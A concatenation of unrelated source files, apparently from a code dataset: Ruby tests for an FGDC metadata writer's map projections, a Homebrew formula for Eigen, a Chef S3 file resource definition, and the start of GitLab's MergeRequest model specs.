assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection sinusoidal'
end
# map projections - space oblique mercator
def test_mapProjection_spaceMercator
expect = @@axExpect[20].to_s.squeeze(' ')
hProjection = TDClass.build_projection('spaceOblique', 'Space Oblique Mercator')
TDClass.add_landsat(hProjection)
TDClass.add_landsatPath(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:landsatNumber] = nil
hProjection[:landsatPath] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection landsat number is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection landsat path is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:landsatNumber)
hProjection.delete(:landsatPath)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection landsat number is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection landsat path is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection spaceOblique'
end
# map projections - stereographic
def test_mapProjection_stereographic
expect = @@axExpect[21].to_s.squeeze(' ')
hProjection = TDClass.build_projection('stereographic', 'Stereographic')
TDClass.add_latPC(hProjection)
TDClass.add_longPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:landsatNumber)
hProjection.delete(:landsatPath)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection stereographic'
end
# map projections - transverse mercator
def test_mapProjection_transverseMercator
expect = @@axExpect[22].to_s.squeeze(' ')
hProjection = TDClass.build_projection('transverseMercator', 'Transverse Mercator')
TDClass.add_scaleFactorCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:scaleFactorAtCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at central meridian is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:landsatNumber)
hProjection.delete(:landsatPath)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection scale factor at central meridian is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection transverseMercator'
end
# map projections - van der grinten
def test_mapProjection_vanDerGrinten
expect = @@axExpect[23].to_s.squeeze(' ')
hProjection = TDClass.build_projection('grinten', 'Van der Grinten')
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:landsatNumber)
hProjection.delete(:landsatPath)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 3, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection grinten'
end
# map projections - projection parameters
def test_mapProjection_projectionParameters
expect = @@axExpect[24].to_s.squeeze(' ')
hProjection = TDClass.build_projection('parameters', 'Map Projection Parameters')
TDClass.add_falseNE(hProjection)
TDClass.add_standardParallel(hProjection, 2)
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_heightPP(hProjection)
TDClass.add_longPC(hProjection)
TDClass.add_latPC(hProjection)
TDClass.add_scaleFactorE(hProjection)
TDClass.add_scaleFactorCL(hProjection)
TDClass.add_scaleFactorPO(hProjection)
TDClass.add_scaleFactorCM(hProjection)
TDClass.add_obliqueLineAzimuth(hProjection)
TDClass.add_obliqueLinePoint(hProjection)
TDClass.add_obliqueLinePoint(hProjection)
TDClass.add_straightFromPole(hProjection)
TDClass.add_landsat(hProjection)
TDClass.add_landsatPath(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
end
# map projections - van der grinten
def test_mapProjection_other
expect = @@axExpect[25].to_s.squeeze(' ')
hProjection = TDClass.build_projection('other', 'Other Projection Description', 'other projection description description')
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:projectionIdentifier][:description] = ''
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 1, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection other projection description is missing: CONTEXT is spatial reference horizontal planar map projection other'
# test missing elements
hProjection[:projectionIdentifier].delete(:description)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 1, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection other projection description is missing: CONTEXT is spatial reference horizontal planar map projection other'
end
end
| 53.67959 | 221 | 0.766966 |
ac00fe4c9e3c0b8e34d1954336e672dfa5c998a1 | 1,443 | class Eigen < Formula
desc "C++ template library for linear algebra"
homepage "http://eigen.tuxfamily.org/"
url "https://bitbucket.org/eigen/eigen/get/3.2.5.tar.bz2"
sha256 "5f6e6cb88188e34185f43cb819d7dab9b48ef493774ff834e568f4805d3dc2f9"
bottle do
cellar :any
sha256 "6f3d26b12625d87f96a92c0c14745c444889377d7990aed6d43ae373e5647f42" => :yosemite
sha256 "38a61f7b2d6926411b14bf93b685d35ba8648993f1f35e3fe98c024de811e310" => :mavericks
sha256 "96ae43217989839b2adbc41dd43a4a02dd6346b4847b93935c5dc481091a7585" => :mountain_lion
end
head "https://bitbucket.org/eigen/eigen", :using => :hg
depends_on "cmake" => :build
option :universal
def install
ENV.universal_binary if build.universal?
mkdir "eigen-build" do
args = std_cmake_args
args << "-Dpkg_config_libdir=#{lib}" << ".."
system "cmake", *args
system "make", "install"
end
(share/"cmake/Modules").install "cmake/FindEigen3.cmake"
end
test do
(testpath/"test.cpp").write <<-EOS.undent
#include <iostream>
#include <Eigen/Dense>
using Eigen::MatrixXd;
int main()
{
MatrixXd m(2,2);
m(0,0) = 3;
m(1,0) = 2.5;
m(0,1) = -1;
m(1,1) = m(1,0) + m(0,1);
std::cout << m << std::endl;
}
EOS
system ENV.cxx, "test.cpp", "-I#{include}/eigen3", "-o", "test"
assert_equal `./test`.split, %w[3 -1 2.5 1.5]
end
end
| 28.86 | 95 | 0.643798 |
ac7dc14e833cf8989579a9d096909608640e1f57 | 820 | actions :create, :create_if_missing
attribute :source, :kind_of => String, :name_attribute => true
attribute :path, :kind_of => String
attribute :access_key_id, :kind_of => String
attribute :secret_access_key, :kind_of => String
attribute :checksum, :kind_of => String, :default => nil
attribute :owner, :regex => Chef::Config[:user_valid_regex]
attribute :group, :regex => Chef::Config[:group_valid_regex]
attribute :mode, :callbacks => {
"not in valid numeric range" => lambda { |m|
if m.kind_of?(String)
m =~ /^0/ || m="0#{m}"
end
Integer(m)<=07777 && Integer(m)>=0
}
}
| 45.555556 | 78 | 0.492683 |
11234982dd49dba20a3d26537c13ee99429098be | 105,985 | # frozen_string_literal: true
require 'spec_helper'
describe MergeRequest do
include RepoHelpers
include ProjectForksHelper
include ReactiveCachingHelpers
using RSpec::Parameterized::TableSyntax
subject { create(:merge_request) }
describe 'associations' do
it { is_expected.to belong_to(:target_project).class_name('Project') }
it { is_expected.to belong_to(:source_project).class_name('Project') }
it { is_expected.to belong_to(:merge_user).class_name("User") }
it { is_expected.to have_many(:assignees).through(:merge_request_assignees) }
it { is_expected.to have_many(:merge_request_diffs) }
context 'for forks' do
let!(:project) { create(:project) }
let!(:fork) { fork_project(project) }
let!(:merge_request) { create(:merge_request, target_project: project, source_project: fork) }
it 'does not load another project due to inverse relationship' do
expect(project.merge_requests.first.target_project.object_id).to eq(project.object_id)
end
it 'finds the associated merge request' do
expect(project.merge_requests.find(merge_request.id)).to eq(merge_request)
end
end
end
describe 'locking' do
using RSpec::Parameterized::TableSyntax
where(:lock_version) do
[
[0],
["0"]
]
end
with_them do
it 'works when a merge request has a NULL lock_version' do
merge_request = create(:merge_request)
described_class.where(id: merge_request.id).update_all('lock_version = NULL')
merge_request.update!(lock_version: lock_version, title: 'locking test')
expect(merge_request.reload.title).to eq('locking test')
end
end
end
describe '#squash_in_progress?' do
let(:repo_path) do
Gitlab::GitalyClient::StorageSettings.allow_disk_access do
subject.source_project.repository.path
end
end
let(:squash_path) { File.join(repo_path, "gitlab-worktree", "squash-#{subject.id}") }
before do
system(*%W(#{Gitlab.config.git.bin_path} -C #{repo_path} worktree add --detach #{squash_path} master))
end
it 'returns true when there is a current squash directory' do
expect(subject.squash_in_progress?).to be_truthy
end
it 'returns false when there is no squash directory' do
FileUtils.rm_rf(squash_path)
expect(subject.squash_in_progress?).to be_falsey
end
it 'returns false when the squash directory has expired' do
time = 20.minutes.ago.to_time
File.utime(time, time, squash_path)
expect(subject.squash_in_progress?).to be_falsey
end
it 'returns false when the source project has been removed' do
allow(subject).to receive(:source_project).and_return(nil)
expect(subject.squash_in_progress?).to be_falsey
end
end
describe '#squash?' do
let(:merge_request) { build(:merge_request, squash: squash) }
subject { merge_request.squash? }
context 'disabled in database' do
let(:squash) { false }
it { is_expected.to be_falsy }
end
context 'enabled in database' do
let(:squash) { true }
it { is_expected.to be_truthy }
end
end
describe '#default_squash_commit_message' do
let(:project) { subject.project }
let(:is_multiline) { -> (c) { c.description.present? } }
let(:multiline_commits) { subject.commits.select(&is_multiline) }
let(:singleline_commits) { subject.commits.reject(&is_multiline) }
it 'returns the oldest multiline commit message' do
expect(subject.default_squash_commit_message).to eq(multiline_commits.last.message)
end
it 'returns the merge request title if there are no multiline commits' do
expect(subject).to receive(:commits).and_return(
CommitCollection.new(project, singleline_commits)
)
expect(subject.default_squash_commit_message).to eq(subject.title)
end
it 'does not return commit messages from multiline merge commits' do
collection = CommitCollection.new(project, multiline_commits).enrich!
expect(collection.commits).to all( receive(:merge_commit?).and_return(true) )
expect(subject).to receive(:commits).and_return(collection)
expect(subject.default_squash_commit_message).to eq(subject.title)
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Issuable) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
it { is_expected.to include_module(Taskable) }
it_behaves_like 'AtomicInternalId' do
let(:internal_id_attribute) { :iid }
let(:instance) { build(:merge_request) }
let(:scope) { :target_project }
let(:scope_attrs) { { project: instance.target_project } }
let(:usage) { :merge_requests }
end
end
describe 'validation' do
it { is_expected.to validate_presence_of(:target_branch) }
it { is_expected.to validate_presence_of(:source_branch) }
context "Validation of merge user with Merge When Pipeline Succeeds" do
it "allows user to be nil when the feature is disabled" do
expect(subject).to be_valid
end
it "is invalid without merge user" do
subject.merge_when_pipeline_succeeds = true
expect(subject).not_to be_valid
end
it "is valid with merge user" do
subject.merge_when_pipeline_succeeds = true
subject.merge_user = build(:user)
expect(subject).to be_valid
end
end
context 'for branch' do
before do
stub_feature_flags(stricter_mr_branch_name: false)
end
using RSpec::Parameterized::TableSyntax
where(:branch_name, :valid) do
'foo' | true
'foo:bar' | false
'+foo:bar' | false
'foo bar' | false
'-foo' | false
'HEAD' | true
'refs/heads/master' | true
end
with_them do
it "validates source_branch" do
subject = build(:merge_request, source_branch: branch_name, target_branch: 'master')
subject.valid?
expect(subject.errors.added?(:source_branch)).to eq(!valid)
end
it "validates target_branch" do
subject = build(:merge_request, source_branch: 'master', target_branch: branch_name)
subject.valid?
expect(subject.errors.added?(:target_branch)).to eq(!valid)
end
end
end
context 'for forks' do
let(:project) { create(:project) }
let(:fork1) { fork_project(project) }
let(:fork2) { fork_project(project) }
it 'allows merge requests for sibling-forks' do
subject.source_project = fork1
subject.target_project = fork2
expect(subject).to be_valid
end
end
end
describe 'callbacks' do
describe '#ensure_merge_request_metrics' do
it 'creates metrics after saving' do
merge_request = create(:merge_request)
expect(merge_request.metrics).to be_persisted
expect(MergeRequest::Metrics.count).to eq(1)
end
it 'does not duplicate metrics for a merge request' do
merge_request = create(:merge_request)
merge_request.mark_as_merged!
expect(MergeRequest::Metrics.count).to eq(1)
end
end
end
describe 'respond to' do
it { is_expected.to respond_to(:unchecked?) }
it { is_expected.to respond_to(:can_be_merged?) }
it { is_expected.to respond_to(:cannot_be_merged?) }
it { is_expected.to respond_to(:merge_params) }
it { is_expected.to respond_to(:merge_when_pipeline_succeeds) }
end
describe '.by_commit_sha' do
subject(:by_commit_sha) { described_class.by_commit_sha(sha) }
let!(:merge_request) { create(:merge_request, :with_diffs) }
context 'with sha contained in latest merge request diff' do
let(:sha) { 'b83d6e391c22777fca1ed3012fce84f633d7fed0' }
it 'returns merge requests' do
expect(by_commit_sha).to eq([merge_request])
end
end
context 'with sha contained not in latest merge request diff' do
let(:sha) { 'b83d6e391c22777fca1ed3012fce84f633d7fed0' }
it 'returns empty requests' do
latest_merge_request_diff = merge_request.merge_request_diffs.create
latest_merge_request_diff.merge_request_diff_commits.where(sha: 'b83d6e391c22777fca1ed3012fce84f633d7fed0').delete_all
expect(by_commit_sha).to be_empty
end
end
context 'with sha not contained in' do
let(:sha) { 'b83d6e3' }
it 'returns empty result' do
expect(by_commit_sha).to be_empty
end
end
end
describe '.in_projects' do
it 'returns the merge requests for a set of projects' do
expect(described_class.in_projects(Project.all)).to eq([subject])
end
end
describe '.set_latest_merge_request_diff_ids!' do
def create_merge_request_with_diffs(source_branch, diffs: 2)
params = {
target_project: project,
target_branch: 'master',
source_project: project,
source_branch: source_branch
}
create(:merge_request, params).tap do |mr|
diffs.times { mr.merge_request_diffs.create }
end
end
let(:project) { create(:project) }
it 'sets IDs for merge requests, whether they are already set or not' do
merge_requests = [
create_merge_request_with_diffs('feature'),
create_merge_request_with_diffs('feature-conflict'),
create_merge_request_with_diffs('wip', diffs: 0),
create_merge_request_with_diffs('csv')
]
merge_requests.take(2).each do |merge_request|
merge_request.update_column(:latest_merge_request_diff_id, nil)
end
expected = merge_requests.map do |merge_request|
merge_request.merge_request_diffs.maximum(:id)
end
expect { project.merge_requests.set_latest_merge_request_diff_ids! }
.to change { merge_requests.map { |mr| mr.reload.latest_merge_request_diff_id } }.to(expected)
end
end
describe '.recent_target_branches' do
let(:project) { create(:project) }
let!(:merge_request1) { create(:merge_request, :opened, source_project: project, target_branch: 'feature') }
let!(:merge_request2) { create(:merge_request, :closed, source_project: project, target_branch: 'merge-test') }
let!(:merge_request3) { create(:merge_request, :opened, source_project: project, target_branch: 'fix') }
let!(:merge_request4) { create(:merge_request, :closed, source_project: project, target_branch: 'feature') }
before do
merge_request1.update_columns(updated_at: 1.day.since)
merge_request2.update_columns(updated_at: 2.days.since)
merge_request3.update_columns(updated_at: 3.days.since)
merge_request4.update_columns(updated_at: 4.days.since)
end
it 'returns target branches sort by updated at desc' do
expect(described_class.recent_target_branches).to match_array(['feature', 'merge-test', 'fix'])
end
end
describe '#target_branch_sha' do
let(:project) { create(:project, :repository) }
subject { create(:merge_request, source_project: project, target_project: project) }
context 'when the target branch does not exist' do
before do
project.repository.rm_branch(subject.author, subject.target_branch)
subject.clear_memoized_shas
end
it 'returns nil' do
expect(subject.target_branch_sha).to be_nil
end
end
it 'returns memoized value' do
subject.target_branch_sha = '8ffb3c15a5475e59ae909384297fede4badcb4c7'
expect(subject.target_branch_sha).to eq '8ffb3c15a5475e59ae909384297fede4badcb4c7'
end
end
describe '#card_attributes' do
it 'includes the author name' do
allow(subject).to receive(:author).and_return(double(name: 'Robert'))
allow(subject).to receive(:assignees).and_return([])
expect(subject.card_attributes)
.to eq({ 'Author' => 'Robert', 'Assignee' => "" })
end
it 'includes the assignees name' do
allow(subject).to receive(:author).and_return(double(name: 'Robert'))
allow(subject).to receive(:assignees).and_return([double(name: 'Douwe'), double(name: 'Robert')])
expect(subject.card_attributes)
.to eq({ 'Author' => 'Robert', 'Assignee' => 'Douwe and Robert' })
end
end
describe '#assignee_or_author?' do
let(:user) { create(:user) }
it 'returns true for a user that is assigned to a merge request' do
subject.assignees = [user]
expect(subject.assignee_or_author?(user)).to eq(true)
end
it 'returns true for a user that is the author of a merge request' do
subject.author = user
expect(subject.assignee_or_author?(user)).to eq(true)
end
it 'returns false for a user that is not the assignee or author' do
expect(subject.assignee_or_author?(user)).to eq(false)
end
end
describe '#visible_closing_issues_for' do
let(:guest) { create(:user) }
let(:developer) { create(:user) }
let(:issue_1) { create(:issue, project: subject.source_project) }
let(:issue_2) { create(:issue, project: subject.source_project) }
let(:confidential_issue) { create(:issue, :confidential, project: subject.source_project) }
before do
subject.project.add_developer(subject.author)
subject.target_branch = subject.project.default_branch
commit = double('commit1', safe_message: "Fixes #{issue_1.to_reference} #{issue_2.to_reference} #{confidential_issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
end
it 'shows only allowed issues to guest' do
subject.project.add_guest(guest)
subject.cache_merge_request_closes_issues!
expect(subject.visible_closing_issues_for(guest)).to match_array([issue_1, issue_2])
end
it 'shows only allowed issues to developer' do
subject.project.add_developer(developer)
subject.cache_merge_request_closes_issues!
expect(subject.visible_closing_issues_for(developer)).to match_array([issue_1, confidential_issue, issue_2])
end
context 'when external issue tracker is enabled' do
before do
subject.project.has_external_issue_tracker = true
subject.project.save!
end
it 'calls non #closes_issues to retrieve data' do
expect(subject).to receive(:closes_issues)
expect(subject).not_to receive(:cached_closes_issues)
subject.visible_closing_issues_for
end
end
end
describe '#cache_merge_request_closes_issues!' do
before do
subject.project.add_developer(subject.author)
subject.target_branch = subject.project.default_branch
end
it 'caches closed issues' do
issue = create :issue, project: subject.project
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }.to change(subject.merge_requests_closing_issues, :count).by(1)
end
it 'does not cache closed issues when merge request is closed' do
issue = create :issue, project: subject.project
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
allow(subject).to receive(:state).and_return("closed")
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to change(subject.merge_requests_closing_issues, :count)
end
it 'does not cache closed issues when merge request is merged' do
issue = create :issue, project: subject.project
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
allow(subject).to receive(:state).and_return("merged")
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to change(subject.merge_requests_closing_issues, :count)
end
context 'when both internal and external issue trackers are enabled' do
before do
subject.project.has_external_issue_tracker = true
subject.project.save!
create(:jira_service, project: subject.project)
end
it 'does not cache issues from external trackers' do
issue = ExternalIssue.new('JIRA-123', subject.project)
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to raise_error
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to change(subject.merge_requests_closing_issues, :count)
end
it 'caches an internal issue' do
issue = create(:issue, project: subject.project)
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }
.to change(subject.merge_requests_closing_issues, :count).by(1)
end
end
context 'when only external issue tracker enabled' do
before do
subject.project.has_external_issue_tracker = true
subject.project.issues_enabled = false
subject.project.save!
end
it 'does not cache issues from external trackers' do
issue = ExternalIssue.new('JIRA-123', subject.project)
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }.not_to change(subject.merge_requests_closing_issues, :count)
end
it 'does not cache an internal issue' do
issue = create(:issue, project: subject.project)
commit = double('commit1', safe_message: "Fixes #{issue.to_reference}")
allow(subject).to receive(:commits).and_return([commit])
expect { subject.cache_merge_request_closes_issues!(subject.author) }
.not_to change(subject.merge_requests_closing_issues, :count)
end
end
end
describe '#source_branch_sha' do
let(:last_branch_commit) { subject.source_project.repository.commit(Gitlab::Git::BRANCH_REF_PREFIX + subject.source_branch) }
context 'with diffs' do
subject { create(:merge_request, :with_diffs) }
it 'returns the sha of the source branch last commit' do
expect(subject.source_branch_sha).to eq(last_branch_commit.sha)
end
end
context 'without diffs' do
subject { create(:merge_request, :without_diffs) }
it 'returns the sha of the source branch last commit' do
expect(subject.source_branch_sha).to eq(last_branch_commit.sha)
end
context 'when there is a tag name matching the branch name' do
let(:tag_name) { subject.source_branch }
it 'returns the sha of the source branch last commit' do
subject.source_project.repository.add_tag(subject.author,
tag_name,
subject.target_branch_sha,
'Add a tag')
expect(subject.source_branch_sha).to eq(last_branch_commit.sha)
subject.source_project.repository.rm_tag(subject.author, tag_name)
end
end
end
context 'when the merge request is being created' do
subject { build(:merge_request, source_branch: nil, compare_commits: []) }
it 'returns nil' do
expect(subject.source_branch_sha).to be_nil
end
end
it 'returns memoized value' do
subject.source_branch_sha = '2e5d3239642f9161dcbbc4b70a211a68e5e45e2b'
expect(subject.source_branch_sha).to eq '2e5d3239642f9161dcbbc4b70a211a68e5e45e2b'
end
end
describe '#to_reference' do
let(:project) { build(:project, name: 'sample-project') }
let(:merge_request) { build(:merge_request, target_project: project, iid: 1) }
it 'returns a String reference to the object' do
expect(merge_request.to_reference).to eq "!1"
end
it 'supports a cross-project reference' do
another_project = build(:project, name: 'another-project', namespace: project.namespace)
expect(merge_request.to_reference(another_project)).to eq "sample-project!1"
end
it 'returns a String reference with the full path' do
expect(merge_request.to_reference(full: true)).to eq(project.full_path + '!1')
end
end
describe '#raw_diffs' do
let(:merge_request) { build(:merge_request) }
let(:options) { { paths: ['a/b', 'b/a', 'c/*'] } }
context 'when there are MR diffs' do
it 'delegates to the MR diffs' do
merge_request.merge_request_diff = MergeRequestDiff.new
expect(merge_request.merge_request_diff).to receive(:raw_diffs).with(options)
merge_request.raw_diffs(options)
end
end
context 'when there are no MR diffs' do
it 'delegates to the compare object' do
merge_request.compare = double(:compare)
expect(merge_request.compare).to receive(:raw_diffs).with(options)
merge_request.raw_diffs(options)
end
end
end
describe '#diffs' do
let(:merge_request) { build(:merge_request) }
let(:options) { { paths: ['a/b', 'b/a', 'c/*'] } }
context 'when there are MR diffs' do
it 'delegates to the MR diffs' do
merge_request.save
expect(merge_request.merge_request_diff).to receive(:raw_diffs).with(hash_including(options)).and_call_original
